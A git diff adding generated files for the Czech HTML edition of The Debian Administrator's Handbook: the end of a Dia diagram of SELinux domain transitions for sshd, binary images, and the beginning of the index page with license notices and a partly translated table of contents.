+          <dia:attribute name="string">
+            <dia:string>#Startup scripts
+initrc_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,10.985"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Text" version="1" id="O9">
+      <dia:attribute name="obj_pos">
+        <dia:point val="8.05,3.25"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="8.05,2.655;9.5425,3.4"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#exec#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="8.05,3.25"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="0"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="valign">
+        <dia:enum val="3"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O10">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.75,7.7"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.69957,7.36754;10.8604,8.09112"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.75,7.7"/>
+        <dia:point val="10.7486,7.73463"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="1" to="O7" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O11">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7486,9.1789"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.69816,9.11272;10.8148,10.6067"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.7486,9.1789"/>
+        <dia:point val="7.8,10.515"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O7" connection="7"/>
+        <dia:connection handle="1" to="O8" connection="6"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Flowchart - Document" version="1" id="O12">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.7325,11.135"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="10.6825,11.085;16.0346,14.5049"/>
+      </dia:attribute>
+      <dia:attribute name="meta">
+        <dia:composite type="dict"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="10.7325,11.135"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.2521067811865478"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="3.3699494936611667"/>
+      </dia:attribute>
+      <dia:attribute name="line_width">
+        <dia:real val="0.10000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="line_colour">
+        <dia:color val="#000000"/>
+      </dia:attribute>
+      <dia:attribute name="fill_colour">
+        <dia:color val="#ffffff"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="0"/>
+        <dia:real val="1"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.35355339059327379"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#/usr/sbin/sshd
+sshd_exec_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.3586,12.1386"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+      <dia:attribute name="flip_horizontal">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="flip_vertical">
+        <dia:boolean val="false"/>
+      </dia:attribute>
+      <dia:attribute name="subscale">
+        <dia:real val="1"/>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O13">
+      <dia:attribute name="obj_pos">
+        <dia:point val="2.35,13.635"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="2.3,13.585;7.5075,16.385"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="2.35,13.635"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="5.1074999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="2.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#SSH server
+sshd_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="4.90375,14.78"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O14">
+      <dia:attribute name="obj_pos">
+        <dia:point val="7.8,11.865"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.74987,11.4969;10.8668,12.2205"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="7.8,11.865"/>
+        <dia:point val="10.755,11.8571"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O8" connection="10"/>
+        <dia:connection handle="1" to="O12" connection="5"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O15">
+      <dia:attribute name="obj_pos">
+        <dia:point val="10.755,13.3014"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="7.35059,13.239;10.8174,14.477"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="10.755,13.3014"/>
+        <dia:point val="7.4575,14.31"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="line_style">
+        <dia:enum val="4"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O12" connection="7"/>
+        <dia:connection handle="1" to="O13" connection="6"/>
+      </dia:connections>
+    </dia:object>
+  </dia:layer>
+</dia:diagram>
diff --git a/tmp/cs-CZ/html/images/selinux-transitions.png b/tmp/cs-CZ/html/images/selinux-transitions.png
new file mode 100644
index 000000000..be53f64ae
Binary files /dev/null and b/tmp/cs-CZ/html/images/selinux-transitions.png differ
diff --git a/tmp/cs-CZ/html/images/ssh-L.dia b/tmp/cs-CZ/html/images/ssh-L.dia
new file mode 100644
index 000000000..6aedac4d3
Binary files /dev/null and b/tmp/cs-CZ/html/images/ssh-L.dia differ
diff --git a/tmp/cs-CZ/html/images/ssh-L.png b/tmp/cs-CZ/html/images/ssh-L.png
new file mode 100644
index 000000000..968e51a25
Binary files /dev/null and b/tmp/cs-CZ/html/images/ssh-L.png differ
diff --git a/tmp/cs-CZ/html/images/ssh-R.dia b/tmp/cs-CZ/html/images/ssh-R.dia
new file mode 100644
index 000000000..4377665c4
Binary files /dev/null and b/tmp/cs-CZ/html/images/ssh-R.dia differ
diff --git a/tmp/cs-CZ/html/images/ssh-R.png b/tmp/cs-CZ/html/images/ssh-R.png
new file mode 100644
index 000000000..33c7c5246
Binary files /dev/null and b/tmp/cs-CZ/html/images/ssh-R.png differ
diff --git a/tmp/cs-CZ/html/images/startup-systemd.dia b/tmp/cs-CZ/html/images/startup-systemd.dia
new file mode 100644
index 000000000..fd6f86e3b
Binary files /dev/null and b/tmp/cs-CZ/html/images/startup-systemd.dia differ
diff --git a/tmp/cs-CZ/html/images/startup-systemd.png b/tmp/cs-CZ/html/images/startup-systemd.png
new file mode 100644
index 000000000..2b86da4d5
Binary files /dev/null and b/tmp/cs-CZ/html/images/startup-systemd.png differ
diff --git a/tmp/cs-CZ/html/images/startup-sysvinit.dia b/tmp/cs-CZ/html/images/startup-sysvinit.dia
new file mode 100644
index 000000000..c10cbf532
Binary files /dev/null and b/tmp/cs-CZ/html/images/startup-sysvinit.dia differ
diff --git a/tmp/cs-CZ/html/images/startup-sysvinit.png b/tmp/cs-CZ/html/images/startup-sysvinit.png
new file mode 100644
index 000000000..d872690bf
Binary files /dev/null and b/tmp/cs-CZ/html/images/startup-sysvinit.png differ
diff --git a/tmp/cs-CZ/html/images/synaptic.png b/tmp/cs-CZ/html/images/synaptic.png
new file mode 100644
index 000000000..f977a1fa6
Binary files /dev/null and b/tmp/cs-CZ/html/images/synaptic.png differ
diff --git a/tmp/cs-CZ/html/images/thunderbird.png b/tmp/cs-CZ/html/images/thunderbird.png
new file mode 100644
index 000000000..d26d2b3e7
Binary files /dev/null and b/tmp/cs-CZ/html/images/thunderbird.png differ
diff --git a/tmp/cs-CZ/html/images/virtual-package.dia b/tmp/cs-CZ/html/images/virtual-package.dia
new file mode 100644
index 000000000..f6b424d37
Binary files /dev/null and b/tmp/cs-CZ/html/images/virtual-package.dia differ
diff --git a/tmp/cs-CZ/html/images/virtual-package.png b/tmp/cs-CZ/html/images/virtual-package.png
new file mode 100644
index 000000000..b819f947c
Binary files /dev/null and b/tmp/cs-CZ/html/images/virtual-package.png differ
diff --git a/tmp/cs-CZ/html/images/wireshark.png b/tmp/cs-CZ/html/images/wireshark.png
new file mode 100644
index 000000000..c27b6f3b5
Binary files /dev/null and b/tmp/cs-CZ/html/images/wireshark.png differ
diff --git a/tmp/cs-CZ/html/images/xfce.png b/tmp/cs-CZ/html/images/xfce.png
new file mode 100644
index 000000000..295160ef0
Binary files /dev/null and b/tmp/cs-CZ/html/images/xfce.png differ
diff --git a/tmp/cs-CZ/html/index.html b/tmp/cs-CZ/html/index.html
new file mode 100644
index 000000000..de5877a09
--- /dev/null
+++ b/tmp/cs-CZ/html/index.html
@@ -0,0 +1,1024 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">The Debian Administrator's Handbook</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="description"
+        content="A reference book presenting the Debian distribution, from initial installation to configuration of services." /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="next"
+        href="preface.html"
+        title="Úvodní slovo" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="preface.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="book"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div
+              class="producttitle"><span
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="productname">Debian</span> <span
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="productnumber">9</span></div><div><h1
+                class="title"><a
+                  id="the-debian-administrators-handbook"></a>The Debian Administrator's Handbook</h1></div><div><h2
+                class="subtitle">Debian Stretch from Discovery to Mastery</h2></div><p
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="edition">Vydání 1</p><div><div
+                xml:lang="cs-CZ"
+                class="authorgroup"
+                lang="cs-CZ"><div
+                  class="author"><h3
+                    class="author"><span
+                      class="firstname">Raphaël</span> <span
+                      class="surname">Hertzog</span></h3><code
+                    class="email"><a
+                      class="email"
+                      href="mailto:hertzog@debian.org">hertzog@debian.org</a></code></div><div
+                  class="author"><h3
+                    class="author"><span
+                      class="firstname">Roland</span> <span
+                      class="surname">Mas</span></h3><code
+                    class="email"><a
+                      class="email"
+                      href="mailto:lolando@debian.org">lolando@debian.org</a></code></div></div></div><div><p
+                class="copyright">Copyright © 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017 Raphaël Hertzog</p></div><div><p
+                class="copyright">Copyright © 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015 Roland Mas</p></div><div><p
+                class="copyright">Copyright © 2012, 2013, 2014, 2015, 2016, 2017 Freexian SARL</p></div><div><div
+                class="legalnotice"><a
+                  id="id-1.1.9"></a><h1
+                  class="legalnotice">Právní doložka</h1><div
+                  class="para">
+			ISBN: 979-10-91414-16-6 (English paperback)
+		</div><div
+                  class="para">
+			ISBN: 979-10-91414-17-3 (English ebook)
+		</div><div
+                  class="para">
+			This book is available under the terms of two licenses compatible with the Debian Free Software Guidelines.
+		</div><div
+                  class="para"><div
+                    xmlns:d="http://docbook.org/ns/docbook"
+                    class="title">Creative Commons License Notice:</div>
+				This book is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://creativecommons.org/licenses/by-sa/3.0/">http://creativecommons.org/licenses/by-sa/3.0/</a></div>
+			</div><div
+                  class="para"><div
+                    xmlns:d="http://docbook.org/ns/docbook"
+                    class="title">GNU General Public License Notice:</div>
+				This book is free documentation: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
+			</div><div
+                  class="para">
+			This book is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+		</div><div
+                  class="para">
+			You should have received a copy of the GNU General Public License along with this program. If not, see <a
+                    href="http://www.gnu.org/licenses/">http://www.gnu.org/licenses/</a>.
+		</div><div
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="important"><div
+                    class="admonition_header"><p><strong>Show your appreciation</strong></p></div><div
+                    class="admonition"><div
+                      class="para">
+				This book is published under a free license because we want everybody to benefit from it. That said maintaining it takes time and lots of effort, and we appreciate being thanked for this. If you find this book valuable, please consider contributing to its continued maintenance either by buying a paperback copy or by making a donation through the book's official website: <div
+                        xmlns=""
+                        class="url">→ <a
+                          xmlns="http://www.w3.org/1999/xhtml"
+                          href="http://debian-handbook.info">http://debian-handbook.info</a></div>
+			</div></div></div></div></div><div><div
+                class="abstract"><p
+                  class="title"><strong>Abstrakt</strong></p><div
+                  class="para">
+			A reference book presenting the Debian distribution, from initial installation to configuration of services.
+		</div></div></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="preface"><a
+                  href="preface.html">Úvodní slovo</a></span></dt><dt><span
+                class="preface"><a
+                  href="foreword.html">Předmluva</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="foreword.html#sect.why-this-book">1. Proč tato kniha?</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.who-is-this-book-for.html">2. Pro koho je tato kniha?</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selected-approach.html">3. Obecný přístup</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.book-structure.html">4. truktura knihy</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.acknowledgments.html">5. Poděkování</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.2">5.1. Trocha historie</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.3">5.2. Zvláštní poděkování přispěvatelům</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.4">5.3. Díky překladatelům</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.5">5.4. Osobní poděkování od Raphaëla</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.acknowledgments.html#id-1.3.9.6">5.5. Osobní poděkování od Rolanda</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="the-debian-project.html">1. Projekt Debian</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#sect.what-is-debian">1.1. Co je Debian?</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="the-debian-project.html#id-1.4.4.8">1.1.1. Multiplatformní operační systém</a></span></dt><dt><span
+                        class="section"><a
+                          href="the-debian-project.html#id-1.4.4.9">1.1.2. Kvalita svobodného softwaru</a></span></dt><dt><span
+                        class="section"><a
+                          href="the-debian-project.html#id-1.4.4.10">1.1.3. Právní rámec: nezisková organizace</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.foundation-documents.html">1.2. Dokumenty nadace</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.foundation-documents.html#sect.social-contract">1.2.1. Závazek vůči uživatelům</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.foundation-documents.html#sect.dfsg">1.2.2. Pokyny Debianu pro svobodný software</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html">1.3. Vnitřní fungování projektu Debian</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.debian-internals.html#id-1.4.6.5">1.3.1. Vývojáři Debianu</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.debian-internals.html#id-1.4.6.6">1.3.2. Aktivní role uživatelů</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.debian-internals.html#id-1.4.6.7">1.3.3. Týmy a podprojekty</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.follow-debian-news.html">1.4. Follow Debian News</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.role-of-distributions.html">1.5. The Role of Distributions</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.role-of-distributions.html#id-1.4.8.4">1.5.1. The Installer: <code
+                            class="command">debian-installer</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.role-of-distributions.html#id-1.4.8.5">1.5.2. The Software Library</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html">1.6. Lifecycle of a Release</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.11">1.6.1. The <span
+                            class="distribution distribution">Experimental</span> Status</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.12">1.6.2. The <span
+                            class="distribution distribution">Unstable</span> Status</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.13">1.6.3. Migration to <span
+                            class="distribution distribution">Testing</span></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.14">1.6.4. The Promotion from <span
+                            class="distribution distribution">Testing</span> to <span
+                            class="distribution distribution">Stable</span></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.release-lifecycle.html#id-1.4.9.15">1.6.5. The <span
+                            class="distribution distribution">Oldstable</span> and <span
+                            class="distribution distribution">Oldoldstable</span> Status</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="case-study.html">2. Presenting the Case Study</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="case-study.html#sect.fast-growing-it-needs">2.1. Fast Growing IT Needs</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.master-plan.html">2.2. Master Plan</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.why-gnu-linux.html">2.3. Why a GNU/Linux Distribution?</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.why-debian.html">2.4. Why the Debian Distribution?</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.why-debian.html#id-1.5.8.5">2.4.1. Commercial and Community Driven Distributions</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.why-debian-stable.html">2.5. Why Debian Stretch?</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="existing-setup.html">3. Analyzing the Existing Setup and Migrating</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="existing-setup.html#sect.heterogeneous-environments">3.1. Coexistence in Heterogeneous Environments</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="existing-setup.html#id-1.6.4.4">3.1.1. Integration with Windows Machines</a></span></dt><dt><span
+                        class="section"><a
+                          href="existing-setup.html#id-1.6.4.5">3.1.2. Integration with OS X machines</a></span></dt><dt><span
+                        class="section"><a
+                          href="existing-setup.html#id-1.6.4.6">3.1.3. Integration with Other Linux/Unix Machines</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html">3.2. How To Migrate</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.4">3.2.1. Survey and Identify Services</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.5">3.2.2. Backing up the Configuration</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.6">3.2.3. Taking Over an Existing Debian Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.7">3.2.4. Installing Debian</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.how-to-migrate.html#id-1.6.5.8">3.2.5. Installing and Configuring the Selected Services</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="installation.html">4. Installation</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="installation.html#sect.installation-methods">4.1. Installation Methods</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-cd">4.1.1. Installing from a CD-ROM/DVD-ROM</a></span></dt><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-usb">4.1.2. Booting from a USB Key</a></span></dt><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-net">4.1.3. Installing through Network Booting</a></span></dt><dt><span
+                        class="section"><a
+                          href="installation.html#sect.install-auto">4.1.4. Other Installation Methods</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html">4.2. Installing, Step by Step</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-boot">4.2.1. Booting and Starting the Installer</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-lang">4.2.2. Selecting the language</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-country">4.2.3. Selecting the country</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-keyboard">4.2.4. Selecting the keyboard layout</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-detect-hardware">4.2.5. Detecting Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-load-components">4.2.6. Loading Components</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-detect-network">4.2.7. Detecting Network Hardware</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-network-config">4.2.8. Configuring the Network</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.10">4.2.9. Administrator Password</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.11">4.2.10. Creating the First User</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-clock-config">4.2.11. Configuring the Clock</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-detect-disks">4.2.12. Detecting Disks and Other Devices</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.install-partman">4.2.13. Starting the Partitioning Tool</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.15">4.2.14. Installing the Base System</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.16">4.2.15. Configuring the Package Manager (<code
+                            class="command">apt</code>)</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.17">4.2.16. Debian Package Popularity Contest</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.18">4.2.17. Selecting Packages for Installation</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#sect.installing-grub">4.2.18. Installing the GRUB Bootloader</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.installation-steps.html#id-1.7.12.20">4.2.19. Finishing the Installation and Rebooting</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.after-first-boot.html">4.3. After the First Boot</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.after-first-boot.html#id-1.7.13.5">4.3.1. Installing Additional Software</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.after-first-boot.html#id-1.7.13.6">4.3.2. Upgrading the System</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="packaging-system.html">5. Packaging System: Tools and Fundamental Principles</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="packaging-system.html#sect.binary-package-structure">5.1. Structure of a Binary Package</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html">5.2. Package Meta-Information</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.package-meta-information.html#sect.control">5.2.1. Description: the <code
+                            class="filename">control</code> File</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.package-meta-information.html#sect.configuration-scripts">5.2.2. Configuration Scripts</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.package-meta-information.html#sect.conffiles">5.2.3. Checksums, List of Configuration Files</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.source-package-structure.html">5.3. Structure of a Source Package</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.source-package-structure.html#id-1.8.7.4">5.3.1. Format</a></span></dt><dt><span
+                        class="section"><a
